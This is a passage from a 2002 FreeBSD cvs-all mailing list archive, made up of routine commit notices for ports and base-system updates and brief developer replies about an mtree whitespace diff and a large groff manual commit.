18 Jun 2002 16:04:31 -0700 (PDT) (envelope-from pat) Message-Id: <200206182304.g5IN4VJ28574@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 16:04:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/paragui Makefile distinfo pkg-plist ports/x11-toolkits/paragui/files patch-configure patch-ltmain.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 16:04:31 PDT Modified files: x11-toolkits/paragui Makefile distinfo pkg-plist Added files: x11-toolkits/paragui/files patch-configure Removed files: x11-toolkits/paragui/files patch-ltmain.sh Log: Update to 1.0.2 PR: ports/39485 Submitted by: KATO Tsuguru Revision Changes Path 1.10 +7 -6 ports/x11-toolkits/paragui/Makefile 1.6 +1 -1 ports/x11-toolkits/paragui/distinfo 1.1 +10 -0 ports/x11-toolkits/paragui/files/patch-configure (new) 1.2 +0 -41 ports/x11-toolkits/paragui/files/patch-ltmain.sh (dead) 1.5 +2 -1 ports/x11-toolkits/paragui/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16:12:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 52B1737B406; Tue, 18 Jun 2002 16:12:50 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5INCoK33674; Tue, 18 Jun 2002 16:12:50 -0700 (PDT) (envelope-from dougb) Message-Id: <200206182312.g5INCoK33674@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 16:12:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/rc.d network1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 16:12:50 PDT Modified files: etc/rc.d network1 Log: Make nisdomainname=NO DTRT Submitted by: des, via Mike Makonnen Revision Changes Path 1.4 +6 -2 src/etc/rc.d/network1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16:14:58 2002 Delivered-To: cvs-all@freebsd.org Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63]) by hub.freebsd.org (Postfix) with ESMTP id C2E1337B408; Tue, 18 Jun 2002 16:14:48 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc03.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020618231448.OGWH20219.sccrmhc03.attbi.com@blossom.cjclark.org>; Tue, 18 Jun 2002 23:14:48 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5INElJX018073; Tue, 18 Jun 2002 16:14:47 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5INEjDI018072; Tue, 18 Jun 2002 16:14:45 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Tue, 18 Jun 2002 16:14:45 -0700 From: "Crist J. Clark" To: "M. Warner Losh" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/mtree BSD.include.dist src/include Makefile src/usr.sbin/wicontrol wicontrol.c Message-ID: <20020618161445.A18051@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <200206172150.g5HLoKk38718@freefall.freebsd.org> <20020618145717.A12206@blossom.cjclark.org> <20020618.170056.69350171.imp@village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020618.170056.69350171.imp@village.org>; from imp@village.org on Tue, Jun 18, 2002 at 05:00:56PM -0600 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 05:00:56PM -0600, M. Warner Losh wrote: > In message: <20020618145717.A12206@blossom.cjclark.org> > "Crist J. Clark" writes: > : On Mon, Jun 17, 2002 at 02:50:20PM -0700, Warner Losh wrote: > : > imp 2002/06/17 14:50:20 PDT > : > > : > Modified files: (Branch: RELENG_4) > : > etc/mtree BSD.include.dist > : > include Makefile > : > usr.sbin/wicontrol wicontrol.c > : > Log: > : > MFC: Finish merging the move from i386/isa -> dev/wi. > : > Pointy-hat-to: Imp for not doing this before 4.6. > : > : Pointy-hat^2 for using tabs and not spaces in an mtree(8) file. > > Ummm, where'd I do that? In the above commit to BSD.include.dist. Or at least it sure looks that way to me, Index: BSD.include.dist =================================================================== RCS file: /export/freebsd/ncvs/src/etc/mtree/BSD.include.dist,v retrieving revision 1.32.2.8 retrieving revision 1.32.2.9 diff -u -r1.32.2.8 -r1.32.2.9 --- BSD.include.dist 25 Mar 2002 21:37:31 -0000 1.32.2.8 +++ BSD.include.dist 17 Jun 2002 21:50:16 -0000 1.32.2.9 @@ -1,4 +1,4 @@ -# $FreeBSD: src/etc/mtree/BSD.include.dist,v 1.32.2.8 2002/03/25 21:37:31 gshapiro Exp $ +# $FreeBSD: src/etc/mtree/BSD.include.dist,v 1.32.2.9 2002/06/17 21:50:16 imp Exp $ # # Please see the file src/etc/mtree/README before making changes to this file. # @@ -18,6 +18,8 @@ .. usb .. + wi + .. .. fs smbfs -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16:45:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BD93E37B406; Tue, 18 Jun 2002 16:45:19 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5INjJK36664; Tue, 18 Jun 2002 16:45:19 -0700 (PDT) (envelope-from pat) Message-Id: <200206182345.g5INjJK36664@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 16:45:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/ssh2 Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 16:45:19 PDT Modified files: security/ssh2 Makefile distinfo pkg-plist Log: Update to 3.2.0 PR: 39491 Submitted by: maintainer Revision Changes Path 1.109 +2 -4 ports/security/ssh2/Makefile 1.31 +1 -1 ports/security/ssh2/distinfo 1.23 +0 -2 ports/security/ssh2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 16:49:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B21537B41B; Tue, 18 Jun 2002 16:49:08 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5INn8X36937; Tue, 18 Jun 2002 16:49:08 -0700 (PDT) (envelope-from pat) Message-Id: <200206182349.g5INn8X36937@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 16:49:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/chkrootkit Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 16:49:08 PDT Modified files: security/chkrootkit Makefile distinfo pkg-descr Log: Update to 0.36 PR: ports/39475 Submitted by: maintainer Revision Changes Path 1.7 +6 -3 ports/security/chkrootkit/Makefile 1.6 +1 -1 ports/security/chkrootkit/distinfo 1.7 +3 -1 ports/security/chkrootkit/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18: 7:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 091E337B40A; Tue, 18 Jun 2002 18:07:14 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J17Eo52408; Tue, 18 Jun 2002 18:07:14 -0700 (PDT) (envelope-from pat) Message-Id: <200206190107.g5J17Eo52408@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 18:07:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/emulators/bochs Makefile ports/emulators/bochs/files patch-configure.in patch-main.cc X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 18:07:13 PDT Modified files: emulators/bochs Makefile Added files: emulators/bochs/files patch-configure.in patch-main.cc Log: - Add patch which fixes build under certain configurations PR: ports/38124 Submitted by: Leland Wang - Fix build for -current and add WITH_NE2000 knob PR: ports/38759 Submitted by: anholt Revision Changes Path 1.46 +10 -1 ports/emulators/bochs/Makefile 1.1 +21 -0 ports/emulators/bochs/files/patch-configure.in (new) 1.1 +11 -0 ports/emulators/bochs/files/patch-main.cc (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:14:13 2002 Delivered-To: cvs-all@freebsd.org Received: from ns2.gnf.org (ns2.gnf.org [63.196.132.68]) by hub.freebsd.org (Postfix) with ESMTP id DA30037B40E; Tue, 18 Jun 2002 18:14:06 -0700 (PDT) Received: from mail.gnf.org (smtp.gnf.org [172.25.11.11]) by ns2.gnf.org (8.11.6/8.11.6) with ESMTP id g5J10hO94994; Tue, 18 Jun 2002 18:00:43 -0700 (PDT) (envelope-from gordon@FreeBSD.org) Received: by mail.gnf.org (Postfix, from userid 888) id 4A2C311E515; Tue, 18 Jun 2002 18:14:06 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mail.gnf.org (Postfix) with ESMTP id 48DD911A572; Tue, 18 Jun 2002 18:14:06 -0700 (PDT) Date: Tue, 18 Jun 2002 18:14:06 -0700 (PDT) From: Gordon Tetlow X-X-Sender: gordont@smtp.gnf.org To: Doug Barton Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/contrib/groff/tmac doc-common groff_mdoc.man src/gnu/usr.bin/groff/tmac mdoc.local In-Reply-To: <200206180041.g5I0fl373672@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 17 Jun 2002, Doug Barton wrote: > dougb 2002/06/17 17:41:47 PDT > > Modified files: > contrib/groff/tmac doc-common groff_mdoc.man > gnu/usr.bin/groff/tmac mdoc.local > Log: > Teach mdoc about the 4.6 release > > Revision Changes Path > 1.53 +1 -0 src/contrib/groff/tmac/doc-common > 1.2 +3965 -369 src/contrib/groff/tmac/groff_mdoc.man ^^^^^^^^^^ > 1.12 +1 -1 src/gnu/usr.bin/groff/tmac/mdoc.local And I thought this was a point release! Was this an accidental commit? -gordon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:17:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA45B37B41B; Tue, 18 Jun 2002 18:17:07 -0700 (PDT) Received: (from trevor@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1H7Q53915; Tue, 18 Jun 2002 18:17:07 -0700 (PDT) (envelope-from trevor) Message-Id: <200206190117.g5J1H7Q53915@freefall.freebsd.org> From: Trevor Johnson Date: Tue, 18 Jun 2002 18:17:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/sgifonts Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG trevor 2002/06/18 18:17:07 PDT Modified files: x11-fonts/sgifonts Makefile Log: Quiet this port. Submitted by: dougb Revision Changes Path 1.3 +15 -15 ports/x11-fonts/sgifonts/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:23:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 33E2237B401; Tue, 18 Jun 2002 18:23:55 -0700 (PDT) Received: (from billf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1NtO54707; Tue, 18 Jun 2002 18:23:55 -0700 (PDT) (envelope-from billf) Message-Id: <200206190123.g5J1NtO54707@freefall.freebsd.org> From: Bill Fumerola Date: Tue, 18 Jun 2002 18:23:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys malloc.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG billf 2002/06/18 18:23:55 PDT Modified files: sys/sys malloc.h Log: fix whitespace botch in previous commit. Revision Changes Path 1.65 +1 -1 src/sys/sys/malloc.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:25: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E128A37B409; Tue, 18 Jun 2002 18:25:05 -0700 (PDT) Received: (from trevor@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1P5l54799; Tue, 18 Jun 2002 18:25:05 -0700 (PDT) (envelope-from trevor) Message-Id: <200206190125.g5J1P5l54799@freefall.freebsd.org> From: Trevor Johnson Date: Tue, 18 Jun 2002 18:25:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/sgifonts Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG trevor 2002/06/18 18:25:05 PDT Modified files: x11-fonts/sgifonts Makefile Log: Prefer the rpm2cpio from ports/archivers/rpm2cpio to the (conflicting) one from ports/archivers/rpm, because the former is much smaller and depends only on Perl. Revision Changes Path 1.4 +1 -1 ports/x11-fonts/sgifonts/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:30:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5ECDB37B40B; Tue, 18 Jun 2002 18:30:06 -0700 (PDT) Received: (from trevor@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1U6755240; Tue, 18 Jun 2002 18:30:06 -0700 (PDT) (envelope-from trevor) Message-Id: <200206190130.g5J1U6755240@freefall.freebsd.org> From: Trevor Johnson Date: Tue, 18 Jun 2002 18:30:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/sgifonts Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG trevor 2002/06/18 18:30:06 PDT Modified files: x11-fonts/sgifonts Makefile Log: Use a pipe instead of a temporary file. Revision Changes Path 1.5 +3 -2 ports/x11-fonts/sgifonts/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:41: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 71D4137B404; Tue, 18 Jun 2002 18:41:00 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1f0h56358; Tue, 18 Jun 2002 18:41:00 -0700 (PDT) (envelope-from gad) Message-Id: <200206190141.g5J1f0h56358@freefall.freebsd.org> From: Garance A Drosehn Date: Tue, 18 Jun 2002 18:41:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/common_source common.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/18 18:41:00 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/common_source common.c Log: MFC 1.25: Assume __STDC__, remove non-__STDC__ code. (update from alfred, drops varargs.h-related code) Revision Changes Path 1.12.2.13 +0 -15 src/usr.sbin/lpr/common_source/common.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:45: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 83FA337B40B; Tue, 18 Jun 2002 18:45:03 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1j3b56790; Tue, 18 Jun 2002 18:45:03 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190145.g5J1j3b56790@freefall.freebsd.org> From: "Tim J. Robbins" Date: Tue, 18 Jun 2002 18:45:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/pr pr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/18 18:45:03 PDT Modified files: usr.bin/pr pr.c Log: Don't convert a single space before a tab stop into a tab when the -i option is used. Revision Changes Path 1.14 +2 -2 src/usr.bin/pr/pr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:46:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DEF9537B407; Tue, 18 Jun 2002 18:46:48 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1kmI56929; Tue, 18 Jun 2002 18:46:48 -0700 (PDT) (envelope-from gad) Message-Id: <200206190146.g5J1kmI56929@freefall.freebsd.org> From: Garance A Drosehn Date: Tue, 18 Jun 2002 18:46:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpd printjob.c recvjob.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/18 18:46:48 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpd printjob.c recvjob.c Log: MFC *: Assume __STDC__, remove non-__STDC__ code. (update from alfred, drops old varargs.h-related code) [* = 1.52 printjob.c, 1.27 recvjob.c] Revision Changes Path 1.22.2.28 +0 -15 src/usr.sbin/lpr/lpd/printjob.c 1.14.2.13 +0 -14 src/usr.sbin/lpr/lpd/recvjob.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:53:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D366137B40D; Tue, 18 Jun 2002 18:53:48 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1rmJ57861; Tue, 18 Jun 2002 18:53:48 -0700 (PDT) (envelope-from gad) Message-Id: <200206190153.g5J1rmJ57861@freefall.freebsd.org> From: Garance A Drosehn Date: Tue, 18 Jun 2002 18:53:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/chkprintcap skimprintcap.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/18 18:53:48 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/chkprintcap skimprintcap.c Log: MFC 1.2: Have this source file use 'static const char rcsid' instead of __RCSID() Revision Changes Path 1.1.2.2 +4 -3 src/usr.sbin/lpr/chkprintcap/skimprintcap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:57:33 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id AB43B37B419; Tue, 18 Jun 2002 18:56:59 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5J1uxP8013041; Tue, 18 Jun 2002 18:56:59 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5J1uxpg013040; Tue, 18 Jun 2002 18:56:59 -0700 (PDT) Date: Tue, 18 Jun 2002 18:56:59 -0700 From: "David O'Brien" To: Gordon Tetlow Cc: Doug Barton , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/contrib/groff/tmac doc-common groff_mdoc.man src/gnu/usr.bin/groff/tmac mdoc.local Message-ID: <20020618185659.A12907@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Gordon Tetlow , Doug Barton , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206180041.g5I0fl373672@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from gordon@FreeBSD.org on Tue, Jun 18, 2002 at 06:14:06PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 06:14:06PM -0700, Gordon Tetlow wrote: > On Mon, 17 Jun 2002, Doug Barton wrote: > > > dougb 2002/06/17 17:41:47 PDT > > > > Modified files: > > contrib/groff/tmac doc-common groff_mdoc.man > > gnu/usr.bin/groff/tmac mdoc.local > > Log: > > Teach mdoc about the 4.6 release > > > > Revision Changes Path > > 1.53 +1 -0 src/contrib/groff/tmac/doc-common > > 1.2 +3965 -369 src/contrib/groff/tmac/groff_mdoc.man > ^^^^^^^^^^ > > 1.12 +1 -1 src/gnu/usr.bin/groff/tmac/mdoc.local > > And I thought this was a point release! Was this an accidental commit? He took a file off the vendor branch. This code is very actively maintained by RU and probably should have gone thru him. I don't know why the fact it was in `contrib' didn't raise a flag! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 18:57:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 70F4637B433; Tue, 18 Jun 2002 18:57:18 -0700 (PDT) Received: (from gad@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J1vIQ58068; Tue, 18 Jun 2002 18:57:18 -0700 (PDT) (envelope-from gad) Message-Id: <200206190157.g5J1vIQ58068@freefall.freebsd.org> From: Garance A Drosehn Date: Tue, 18 Jun 2002 18:57:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/lpr/lpr printcap.5 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gad 2002/06/18 18:57:18 PDT Modified files: (Branch: RELENG_4) usr.sbin/lpr/lpr printcap.5 Log: MFC 1.28: mdoc(7) police: markup nits. (original update from ru) Revision Changes Path 1.16.2.11 +11 -7 src/usr.sbin/lpr/lpr/printcap.5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 19: 2:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D1FDA37B40E; Tue, 18 Jun 2002 19:02:03 -0700 (PDT) Received: (from ache@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J223858737; Tue, 18 Jun 2002 19:02:03 -0700 (PDT) (envelope-from ache) Message-Id: <200206190202.g5J223858737@freefall.freebsd.org> From: "Andrey A. Chernov" Date: Tue, 18 Jun 2002 19:02:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13 Makefile distinfo pkg-plist ports/www/apache13/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ache 2002/06/18 19:02:03 PDT Modified files: www/apache13 Makefile distinfo pkg-plist www/apache13/files patch-aa Log: Upgrade to 1.3.26 Unforbidde it. Revision Changes Path 1.119 +4 -8 ports/www/apache13/Makefile 1.49 +1 -2 ports/www/apache13/distinfo 1.7 +4 -8 ports/www/apache13/files/patch-aa 1.45 +60 -21 ports/www/apache13/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 19:21:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D123737B404; Tue, 18 Jun 2002 19:21:47 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J2Llu64850; Tue, 18 Jun 2002 19:21:47 -0700 (PDT) (envelope-from marcus) Message-Id: <200206190221.g5J2Llu64850@freefall.freebsd.org> From: Joe Marcus Clarke Date: Tue, 18 Jun 2002 19:21:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/gdk-pixbuf Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/18 19:21:47 PDT Modified files: graphics/gdk-pixbuf Makefile distinfo 